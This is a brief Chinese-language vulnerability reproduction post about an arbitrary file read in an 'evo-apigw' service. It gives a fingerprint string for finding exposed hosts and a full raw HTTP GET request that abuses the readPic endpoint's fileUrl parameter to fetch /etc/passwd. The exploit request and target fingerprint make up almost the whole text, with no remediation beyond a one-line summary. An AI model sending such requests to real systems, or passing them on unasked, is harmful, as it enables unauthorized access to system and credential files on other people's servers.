指纹特征
body="*客户端会小于800*"
漏洞复现
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/2
Host:
Cookie: JSESSIONID=A5615077B7461A2C753A6BD02FFD7A9F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
文章详细描述了一次针对evo-apigw服务的漏洞复现,涉及通过GET请求获取file:/etc/passwd文件,展示了客户端可能存在的指纹特征,强调了安全风险和处理此类问题的重要性。
675
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
